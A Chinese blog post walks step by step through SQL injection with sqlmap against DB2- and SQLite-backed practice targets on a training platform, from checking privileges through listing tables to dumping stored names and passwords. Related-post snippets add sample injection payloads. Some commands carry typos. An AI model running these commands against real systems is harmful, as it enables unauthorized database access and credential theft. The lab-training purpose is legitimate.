sqlmap(四)案例

已于 2024-04-06 12:25:02 修改
阅读量779 收藏 11
点赞数 12
分类专栏: SQL 文章标签: android sql
于 2024-04-06 12:23:35 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ys1215/article/details/137424433
版权

一、注入DB2

http://124.70.71.251:49431/new_list.php?id=1

这是墨者学院里的靶机,地址:icon-default.png?t=N7T8https://www.mozhe.cn/

1.1 测试数据库类型

python sqlmap.py -u "http://124.70.71.251:49431/new_list.php?id=1"

1.2 测试用户权限类型

查询选项

--is-dba                 查看当前用户是否为管理员

--current-usre       查看当前用户的用户名

--privileges           查看当前用户的权限

python sqlmap.py -u  "http://124.70.71.251:49431/new_list.php?id=1" --is-dba

查看当前用户的用户名

python sqlmap.py -u "http://124.70.71.251:49431/new_list.php?id=1" --current-usre

查看当前用户的权限

python sqlmap.py -u "http://124.70.71.251:49431/new_list.php?id=1" --privileges

1.3 查看库名

--dbs:获取系统中的所有库的名字

--current-db:获取当前库的名字

python sqlmap.py -u "http://124.70.71.251:49431/new_list.php?id=1" --dbs
python sqlmap.py -u "http://124.70.71.251:49431/new_list.php?id=1" --current-db

1.4 查看表名

-D "库名" --tables

python sqlmap.py -u "http://124.70.71.251:49431/new_list.php?id=1" -D "DB2INST1" --tables

1.5 查看字段名

-D "库名" -T "表名" --columns

python sqlmap.py -u "http://124.70.71.251:49431/new_list.php?id=1" -D "DB@INST1" -T "NOTICE" --columns

1.6 查数据

-D "库名" -T "表名" --dump                          查表中的全部数据

-D "库名" -T "表名" --dump -C "字段"          查表中指定字段中的数据

python sqlmap.py -u "http://124.70.71.251:49431/new_list.php?id=1" -D "DB2INST1" -T "NOTICE" -C "CONTENT" --dump

二、注入sqlite

测试地址:http://124.70.71.251:44648/new_list.php?id=1

2.1 测试数据库类型

清除缓存:--purge

python sqlmap.py -u "http://124.70.71.251:44648/new_list.php?id=1" --purge

2.2 测试用户权限类型

查询选项

--is-dba                查看当前用户是否为管理员

--current-user       查看当前用户的用户名【sqlite不支持】

--privileges           查看当前用户的权限

python sqlmap.py -u "http://124.70.71.251:44648/new_list.php?id=1" --is-dba

2.3 查看库名 

--dbs:获取系统中的所有库的名字【sqlite不支持】

--current-db:获取当前库的名字【sqlite不支持】

2.4 查看表名

-D "库名" --tables 【sqlite不支持】

--tables【sqlite只能这样写】

python sqlmap.py -u "http://124.70.71.251:44648/new_list.php?id=1" --tables

2.5 查看字段名

-T "表名" --columns

python sqlmap.py -u "http://124.70.71.251:44648/new_list.php?id=1" -T "WSTMart_reg" --columns

2.6 查数据

-D "库名" -T "表名" --dump                     查表中的全部数据

-D "库名" -T "表名" --dump -C "字段"     查看表中的指定字段中的数据

python sqlmap.py -u "http://124.70.71.251:44648/new_list.php?id=1" -T "WSTMart_reg" --dump -C "name,password"
ys52IT
关注
  • 12
    点赞
  • 11
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 2
    评论
专栏目录
SQLmap使用手册1
08-03
SQLmap 所支持的数据库系统基本涵盖了我们常用的一些关系类的数据库诸如:MySQL、Oracle、PostgreSQL、MSSQL、Microsoft、IB
sqlmap-master.zip
11-05
SQL注入防护策略 1. 输入验证:对用户提交的数据进行严格的格式检查和过滤,避免非法字符或语句。 2. 参数化查询:使用预编译语句,将用户输入与SQL语句分离,减少注入风险。 3. 最小权限原则:数据库用户只赋予...
Sqlmap参数详解
gao646467783的博客
11-21 805
sqlmap全参数详解 sqlmap是在sql注入中非常常用的一款工具,由于其开源性,适合从个人到企业,从学习到实战,各领域各阶段的应用,我们还可以将它改造成我们自己独有的渗透利器。这款工具中,大大小小191个参数,在这篇文章中,我将一一介绍,其实很多参数我也没有使用过,所以有一些...
SQLMAP教程,零基础入门到精通,一篇就够了!
最新发布
程序员阿飘 的博客
02-19 861
这些选项可以用来创建用户自定义函数`--udf-inject 注入用户自定义函数`` ` `--shared-lib=SHLIB 共享库的本地路径`
SQLMap工具-1】SQLMap简介及简单应用实例
热门推荐
m0_64378913的博客
04-27 4万+
1 SQLMap简介 SQLMap 是一个自动化的SQL注入工具,其主要功能是扫描、发现并利用给定URL的SQL注入漏洞,内置了很多绕过插件,支持的数据库是MySQL 、Oracle 、PostgreSQL 、Microsoft SQL Server、Microsoft Access 、IBM DB2, SQ Lite 、Firebird 、Sybase和SAPMaxDB 。 注意:sqlmap只是用来检测和利用sql注入点,并不能扫描出网站有哪些漏洞,使用前请先使用扫描工具扫出sql注入点。 SQLMap
sqlmap的使用与实例
Hardworking666的博客
05-13 1793
提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 文章目录一、sqlmap简介二、使用步骤1.注入2.用户权限 一、sqlmap简介 Sqlmap是开源的自动化SQL注入工具,由Python写成。 sqlmap支持五种不同的注入模式: 1、基于布尔的盲注,即可以根据返回页面判断条件真假的注入。 2、基于时间的盲注,即不能根据页面返回内容判断任何信息,用条件语句查看时间延迟语句是否执行(即页面返回时间是否增加)来判断。 3、基于报错注入,即页面会返回错误信息,或者把注入的语句的结果直接返回在
Sqlmap的使用实例
lsyhaoshuai的博客
05-14 522
Sqlmap的使用实例 Sqlmap是渗透中一种常见的注入工具,之前的sqlmap只支持python2.6和python2.7,傻傻的我看博客的时候竟然不知道看日期,现在都2020年了,如今sqlmap也支持python3.0了。 俗话说工欲善其事必先利其器,欲练习sqlmap的注入学习必须先把工具准备齐全,这一版首先分享一下环境的布置,以及自己踩过的坑。准备工具如下: 1.python3.7 可以从官网下载 https://www.python.org/downloads/ python的安装步骤可以自行
sqlmap mysql案例_sqlmap介绍与使用案例
weixin_30896451的博客
01-19 172
4. 测试sqlmap功能4.1 使用DVWA测试网站4.1.1 关于dvwa这个网站有sql漏洞,专门拿来测试用,不知道是哪位好心人搞出来的4.1.2 操作首先登陆成功以后三步走,拿到需要的urlimage.png拿到url以后,就可以使用这个url来注入了出现如下结果,则表示sqlmap检测到有可以注入的地方,ps:如果没有检测到可以注入的地方,会显示如下image.png既然检测到有可以注入...
sqlmap注入实例
~初出茅庐~ 的博客
10-16 1086
第一步: 安装Python, 安装完成将sqlmap文件夹解压放到C:\Python27\下面。 附件(Python2.7.1安装包+sqlmap包): https://download.csdn.net/download/qq_23306363/10724195 第二步: 1)win+R,输入cmd,输入 cd c:\ 进入c盘 2)确定网址:如"http://XXX" 3)输入...
sqlmap注入简单实例
A1956936030的博客
09-10 316
sqlmap详情见上篇《sqlmap安装及简单使用实例》 1.打开 sqlmap ,通过命令 python sqlmap.py -u “url” --dump -T “manager” -D “rjxy" 找到目标密码 2.目标密码为:ZGM2M2VlMmUyYTE2M2QONmE3MGFiNDRhNzUxYzBkMjA= 用base64解密为: dc63ee2e2a163d46a70ab44a751c0d20 再用MD5解码为: ahead8418 最终完成解密 ...
SQLMAP系列课程
04-27
8. 案例分析与实战演练:通过实际案例分析,演示SQLMAP在真实环境中的应用,提高学员的实战能力。 9. 高级技巧与进阶使用:可能包括多线程攻击、HTTP代理设置、使用自定义脚本扩展功能等高级主题。 通过这个系列...
SQLMAP系列课程视频.rar
11-13
9. **实战案例**:课程可能包含实际的渗透测试场景,展示如何在安全环境中应用SQLMAP发现和利用SQL注入漏洞。 10. **防御策略**:虽然主要讲解攻击工具,但也会提及防御SQL注入的措施,比如使用预编译语句、输入...
一次sqlmap
05-27
在这个案例中,我们看到一个用户使用SQLMap来扫描特定网址`http://jzwk.ayfy.com/keshidongtai.php?id=94`,并揭示了该站点存在多个数据库。 1. **发现数据库**: 在第一步,使用`sqlmap.py -u <URL> --dbs`命令,...
sqlmap2015
11-28
1. **超级SQL注入工具使用说明书V1.4.docx**:这是一个详细的用户指南,可能包含如何安装、配置和使用该工具的步骤,以及各种注入技巧和案例研究。 2. **SuperSQLInjection.exe**:这是工具的执行文件,可能是加强版...
记一次sqlmap案例实验
千寻的博客
02-21 625
文章目录环境搭建Sql map参数第一步 检测注入点第二步 列出所有数据库的名字第三步 列出当前数据库的名字第步 列出表名第五步列出所有的字段名第六步 列出字段内容免责声明 环境搭建 网站搭建–window server 2008 phpstudy 测试机 kali虚拟机 Sql map参数 参数 含义 -u “url” 检测注入点 –dbs 列出所有数据库的名字 –c...
初级SQLmap注入实例
weixin_45854655的博客
05-30 512
初级SQLmap注入实例前言一、找到可能的注入参数二、进行SQL注入1.猜解可用数据库2.猜解可用数据库中的表3.猜解表中的列4.Dump列中的所有数据项写在结尾 前言 SQLmapSQL注入的经典工具 尤其作为Kali Linux预装的注入工具,非常适合新手学习和使用 下面就通过一个简单的例子来了解SQLmap的基本用法 一、找到可能的注入参数 使用SQLmap进行注入时,url或本地文件中的url应当含有查询参数 否则SQLmap将无法定位可能的注入点,也就无法完成后续的工作 ! 二、进行SQL
sqlmap
weixin_44722125的博客
04-09 462
sql 漏洞常见防范措施 sqlmap 工具使用入门及案例介绍 经典用法
sqlmap实现注入操作
MichaelZhao
01-06 2881
SqlMap注入 在google中查询可注入的网站地址 用一下地址查询: inurl:index.php?id= inurl:trainers.php?id= inurl:buy.php?category= inurl:article.php?ID= inurl:lay_old.php?id= inurl:declaration_more.php?decl_id= inurl:ageid=
SQLMAP基础及用法
m0_73720136的博客
04-17 406
2.基于时间的盲注:不能根据页面返回内容判断任何信息,用条件语句查看时间延迟语句是否执行(即页面返回时间是否增加)来判断。SQLMAP是一个开源的自动化SQL注入工具,其主要功能是扫描、发现并利用给定的URL的SQL注入漏洞。3.基于报错的注入:页面会返回错误信息,或者把注入的语句的结果直接返回在页面中。2.判断可以用哪种SQL注入技术来注入识别出所有存在的注入类型。4.基于联合查询的注入:可以使用UNION的情况下的注入。1.基于布尔的盲注:根据返回页面判断条件真假的注入。3.识别出所有存在的注入类型。
sqlmap测试案例
08-29
可以提供一些常见的 SQLMap 测试案例,帮助你了解其功能和用法。以下是一些示例: 1. 基本测试: ``` python sqlmap.py -u "http://example.com/page.php?id=1" ``` 2. POST 请求测试: ``` python sqlmap.py -u "http://example.com/login.php" --data "username=admin&password=pass" --method POST ``` 3. Cookie 注入测试: ``` python sqlmap.py -u "http://example.com/page.php" --cookie "PHPSESSID=1234567890" ``` 4. 扫描整个网站: ``` python sqlmap.py -u "http://example.com" --crawl=3 ``` 5. 使用自定义 Payload 进行测试: ``` python sqlmap.py -u "http://example.com/page.php?id=1" --payload="1' OR '1'='1" ``` 请记住,在进行任何安全测试时,请确保已经获得合法授权,并且仅在授权范围内进行测试。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

ys52IT

你的鼓励将是我创作的最大动力你

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值